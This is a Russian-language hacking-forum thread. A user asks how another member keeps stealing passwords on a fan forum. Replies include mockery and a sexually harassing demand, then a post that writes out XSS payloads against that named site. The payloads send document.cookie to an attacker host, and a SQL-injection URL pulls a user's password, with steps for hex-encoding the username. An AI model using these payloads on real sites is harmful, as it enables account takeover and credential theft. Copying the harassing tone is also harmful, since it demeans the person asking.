Здравствуйте! Зарание извините если я пишу не в том разделе!

У меня такой вопрос, на данном форуме (http://www.eminem.com/forum/) один пользователь постоянно ворует чужие пароли. Сегодня он и мой утянул. :( Я совсем не разбераюсь во всех этих штуках, может кто-нибудь мне сможет помочь? Я не прошу хакнуть чужой аккаунт, просто может кто-нибудь сможет обьяснить как хакер это сделал....

Видишь ли подружка, по видимому у него есть то, чем ты не обладаешь.

Уточни

1. Какой пароль ( от чего)
2. Сложность пароля


если пасс от эьтогго же форума то через XSS куки спер. (палить не буду)

2KATYA

Выходи за мну =)

Видишь ли подружка, по видимому у него есть то, чем ты не обладаешь.

Только потому что я не разбераюсь в хакерстве не означает что я дура. И не надо плиз тут крутую из себя строить и обсерать других, я обратилась за помощью.

Уточни

1. Какой пароль ( от чего)
2. Сложность пароля


если пасс от эьтогго же форума то через XSS куки спер. (палить не буду)

2KATYA

Выходи за мну =)

Пароль от моего аккаунта на форуме. Пароль простой был, просто очень неприятно когда от твоего имени на форуме кто-то пишет всякие гадости. Спасибо что отозвался!

Видимо у него есть брут, и если пароль простой, только из цифр, то он его сбрутил, а про твои интеллектуальные способности я и не думала говорить :(

Видимо у него есть брут, и если пароль простой, только из цифр, то он его сбрутил, а про твои интеллектуальные способности я и не думала говорить :(

Извини пожалуйста если я тебя не так поняла! Я думала ты имееш в виду "у него есть мозг, а у тебя нет". Сорри! Катюш, а не могла бы ты мне подсказать что такое брут или где об этом можно почитать? Кстати, пароль был только из букв, но дело в том что он ворует пароли у всех.

edit// ааа уже поняла что такое брут, не заметила что на форуме есть такие подсказки

напиши на титьках GreenBear и выложи сюда фотку
а то мне плохо ясна суть проблеммы :o

Будем считать что написала и выложила...

Проблема: Я бы хотела узнать как один козёл смог украсть пароль от моего аккаунта на http://www.eminem.com/forum/. Вот ссылка на мой аккаунт: http://www.eminem.com/user/default.aspx?mid=5812343

У меня такое ощущение что он просто вводит какой-то код в стоку браузера и ему отображается мой пароль. Но может я говорю ерунду...

напиши на титьках GreenBear

А он тут причем?

Пароль простой был, просто очень неприятно когда от твоего имени на форуме кто-то пишет всякие гадости

Катюш не ставь более , простых паролей. лучше запиши в текстовый файлик какую нить краказяблу - типо "JKG*(^(87uy" и используй.

Удачи в освоении азов безопасности, почитай этот форум и многое будет ясно а чем сможем тем и поможем (покрайне мере я)

2Кати

Не ссортесь, когдато все были олухами в этой отрасли.

Будем считать что написала и выложила...

Проблема: Я бы хотела узнать как один козёл смог украсть пароль от моего аккаунта на http://www.eminem.com/forum/. Вот ссылка на мой аккаунт: http://www.eminem.com/user/default.aspx?mid=5812343

У меня такое ощущение что он просто вводит какой-то код в стоку браузера и ему отображается мой пароль. Но может я говорю ерунду...
Комп проскань на троянцев
потому что брут сейчас не в моде

А он тут причем?
в его подписи приколюху прочитал или в профайле не помню

Катюш не ставь более , простых паролей. лучше запиши в текстовый файлик какую нить краказяблу - типо "JKG*(^(87uy" и используй.

Удачи в освоении азов безопасности, почитай этот форум и многое будет ясно а чем сможем тем и поможем (покрайне мере я)

Да, спасибо, я уже изменила на более сложный. Но не смогу спокойно спать не узнав как же он всё-таки, извините, п*здит пароли....

2Кати

Не ссортесь, когдато все были олухами в этой отрасли.

Нет нет, это я не так поняла Катю. Моя ошибка. =)

У меня такое ощущение что он просто вводит какой-то код в стоку браузера и ему отображается мой пароль.
Так и есть...

Комп проскань на троянцев
потому что брут сейчас не в моде

Неее троянов у меня точно нету. Это он как-то по другому пароли тянет... :mad:

Так и есть...

Эх, если бы ещё узнать что за код он вводит... :rolleyes:

Ребят, может кому что-то похожее попадалось?

Неее троянов у меня точно нету. Это он как-то по другому пароли тянет... :mad:
я все твои темы почитал, ты постоянно просишь что то взломать :(
а теперь ты увлеклась соц инженерией и нашла хитроумный способ просьбы о взломе. :o
и не говори что я не прав, потому что в 0:42 по Москве у меня открываются телепатические способности :o

Эх, если бы ещё узнать что за код он вводит... :rolleyes:

Ребят, может кому что-то похожее попадалось?
http://forum.antichat.ru/nextnewesttothread28451.html

извините, п*здит пароли....

Конкретно , вариантов в твоем случае два, но зависит кто именно и в его квалификации.

Брут пароля (в твоем случае вероятная штука июо простой)
и XSS про которую я отписывал админам еще месяц назад (когда встретил подобную жаолобу на зарубежке)

потому что брут сейчас не в моде

конкретно на этом форуме проблем не возникает.

в его подписи приколюху прочитал или в профайле не помню

не видел, извеняюсь.

Так и есть...

+1 ;)

в 0:42 по Москве у меня открываются телепатические способности :o
+5 :D

Эх, если бы ещё узнать что за код он вводит... :rolleyes:

Ребят, может кому что-то похожее попадалось?

пока я писал своё предидущее сообщение, ты уже всё подтвердила :D

я все твои темы почитал, ты постоянно просишь что то взломать :(
а теперь ты увлеклась соц инженерией и нашла хитроумный способ просьбы о взломе. :o
и не говори что я не прав, потому что в 0:42 по Москве у меня открываются телепатические способности :o

Дело в том что я вэб-дизайнер и у меня было давольно много случаев когда люди воровали у меня мои работы и пытались их продать. Это былa простая человеческая месть. Мне было ужасно обидно что я часами корпела над работами а потом какая-та сволоч их украла и еше и продаёт!

А теперь халнули меня и мне конечно интересно узнать как он это сделал.

Дело в том что я вэб-дизайнер и у меня было давольно много случаев когда люди воровали у меня мои работы и пытались их продать. Это былa простая человеческая месть. Мне было ужасно обидно что я часами корпела над работами а потом какая-та сволоч их украла и еше и продаёт!

А теперь халнули меня и мне конечно интересно узнать как он это сделал.
да забей ты на всё это, иди на улицу бахни пивка,легче станет честно ;)

у меня такое ощущение что это реклама... если нет то сорри)
катушка, ты что хочешь стать "хакершой"?)восстанови просто свой аккаут)

да забей ты на всё это, иди на улицу бахни пивка,легче станет честно ;)

Я пиво то не очень люблю.. да у нас тут закрыто всё уже давно.

у меня такое ощущение что это реклама... если нет то сорри)
катушка, ты что хочешь стать "хакершой"?)восстанови просто свой аккаут)

Реклама? Чего??? :eek: Нет, ну что ты, какая реклама. :)

А я не то чтобы хочу хакершой стать, просто хотела понять как так можно пароль угнать. Ну да ладно, ответ на вопрос не получила, хотя я понимаю никому не охота заниматься да и сразу так наверное не разберёшся.

В общем так, либо трояны в твоем компе, либо пасс были 12345, йцукен, qwerty или дата твоего рождения . Сейчас ты наверное поменяла пасс на katusha123 или katusha555 (тоже оооочень сложно) или на чтото связанное с тобой (например фамилию, имя любимой собачки или парня, сорри канеш за приравнивания парней к собачкам)))). Еще вариант ктото безпаливно сломал твое мыло с регой на форум- и теперь периодически шлет себе твои пароли.

В общем так, либо трояны в твоем компе, либо пасс были 12345, йцукен, qwerty или дата твоего рождения . Сейчас ты наверное поменяла пасс на katusha123 или katusha555 (тоже оооочень сложно) или на чтото связанное с тобой (например фамилию, имя любимой собачки или парня, сорри канеш за приравнивания парней к собачкам)))). Еще вариант ктото безпаливно сломал твое мыло с регой на форум- и теперь периодически шлет себе твои пароли.

Представь себе дорогой Хелл что я пароль сменила не на фамилию, имя собачки, кошечки и т.п. Я уже сказала что я вэб-дизайнер и поверь мне я прекрасно понимаю что такое безопасность. Просто я не очень серьёзно отнеслась к тому форуму. И не надо думать что все девушки тупые куклы которые нифига не понимают в компьютерах. Не все такие. А если хочется над кем-то поиздеваться найди себе кого-нибудь другого.

А сегодня утром я заметила что того придурка с форума забанили. Так что вопрос закрыт. Спасибо тем кто помог советами, а не издёвками!

1. XSS. Хакер мог внедрить html код при посмотре которого тобою, хареку отправляетсяваш пороль (ну не совесем пароль а cookies, но из них как правило можно извлеч пароль).

Пассивная XSS, вам дают ссылку, или ссылку которая перенаправляет вас на ссылку вида http://www.eminem.com/forum/default.aspx?cid="><script>img = new Image(); img.src="http://www.hacker-site.ru?"+document.cookie;</script>

Активная XSS это вставка кода в форму, с плохой отсутвием фильтрации, например вместо картинки вставляют код:
[img]http://www.hacker (http://www.hacker-site.ru)onerror:img = new Image(); img.src="http://www.hacker-site.ru?"+document.cookie;-site.ru/img.png[img]

2. SQL-Injection. Харкер путём подставления кода в url мог"вытянуть" твой пароль из базы данных форума.
Такой "код" выглидит как правило вот так:
http://www.eminem.com/forum/default.aspx?cid=-1+union+select+select+concat_ws(0x3a,name,password )+db.f_members+wrehe+name=0x4b617475736861
(0x4b617475736861 это аналог 'Katusha')

3. Перебор паролей, думаю понятно.

3. Он телепат :rolleyes:



Если он смог пароли узнать, то уж как бан обойти сможет догадатся :)

Ой, спасибо тебе огромное что разъяснил! Теперь я понимаю как он угнал мой пароль. А как он так смог моё имя в 0x4b617475736861 (ну или подобное) переделать?

Katusha, 0x4b617475736861 - это Hex
Можно получить так.
http://x3k.ru - En/De Coder.
Вводишь в поле Katusha, ставишь ASCII to Hex, жмёшь на кнопку "En/De Code" и получаешь "4b 61 74 75 73 68 61".
Добавляешь вначале 0x и дописываешь расшифрованный текст без пробелов.

А ещё проще заскриптовать перевод..

Katusha, 0x4b617475736861 - это Hex
Можно получить так.
http://x3k.ru - En/De Coder.
Вводишь в поле Katusha, ставишь ASCII to Hex, жмёшь на кнопку "En/De Code" и получаешь "4b 61 74 75 73 68 61".
Добавляешь вначале 0x и дописываешь расшифрованный текст без пробелов.

А ещё проще заскриптовать перевод..

Спасибо! Попробовала себя "хакнуть", но страничка просто перезагрузилась и ничего. Но всё равно спасибо что открыли глаза! :)

да нескажи =)
тут такие присутствуют =)
и у знакомых у меня есть такие =)
(но я их баюсь почему-то)

Не переживайте! В один прекрасный день девушки вам ещё покажут. ;) Как хакнут вас пацанов, потом инфу не восстановите. :p




Щутка